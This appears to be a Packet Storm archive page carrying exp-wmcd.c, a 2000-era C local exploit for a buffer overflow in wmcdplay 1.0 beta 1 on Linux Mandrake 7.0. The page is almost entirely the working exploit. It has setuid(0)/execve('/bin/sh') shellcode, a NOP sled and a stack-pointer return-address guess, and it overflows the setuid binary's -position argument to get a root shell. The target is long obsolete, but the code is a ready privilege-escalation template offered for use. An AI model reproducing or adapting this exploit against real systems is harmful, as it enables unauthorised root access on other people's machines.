exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

exp-wmcd.c

exp-wmcd.c
Posted Apr 19, 2000
Authored by Dethy

Local exploit for Linux Mandrake 7.0's wmcdplay 1.0 beta 1. Unlike the Teso exploit for wmcdplay, this code exploits the -position argument.

tags | exploit, local
systems | linux, mandrake
SHA-256 | eed00eb19c97858a9e3a92302523c50bd3259f79d45239243286e9ab1b43681f

exp-wmcd.c

Change Mirror Download
/*
Local exploit for Linux Mandrake 7.0's wmcdplay 1.0 beta 1
- Found by TESO crew originally, although multiple bof's exist elsewhere.
- I chose the "-position" argument to exploit, TESO used the "-d".

Code: dethy @ synnergy.net
*/

#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90
#define BS 1300
#define OFF 400 /* increment +- 100 */

/* uid(0); euid(0); */
char shellcode[] =
"\xeb\x1f" /* jmp 0x1f */
"\x5e" /* popl %esi */
"\x89\x76\x08" /* movl %esi,0x8(%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x88\x46\x07" /* movb %eax,0x7(%esi) */
"\x89\x46\x0c" /* movl %eax,0xc(%esi) */
"\xb0\x0b" /* movb $0xb,%al */
"\x89\xf3" /* movl %esi,%ebx */
"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xd8" /* movl %ebx,%eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
"\xe8\xdc\xff\xff\xff" /* call -0x24 */
"/bin/sh"; /* .string \"/bin/sh\" */


u_long get_sp(void) { __asm__("movl %esp,%eax"); }

void main(int argc, char **argv) {
char *buffer, *ptr; long *address_ptr, *address;
int i, bsize = BS, nop = NOP, offset = OFF;
buffer = malloc(bsize);

(char *)address = get_sp() - offset;
printf("return address: %#x\n", address);

ptr = buffer;
address_ptr = (long *)ptr;

for(i=0; i < bsize; i += 4) (int *) *(address_ptr++) = address;
for(i=0; i < bsize / 2 ; i++) buffer[i] = nop;

memcpy(buffer + i, shellcode, strlen(shellcode));
execl("/usr/X11R6/bin/wmcdplay", "wmcdplay", "-position", buffer, 0);
}
/* www.hack.co.za [21 July]*/
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close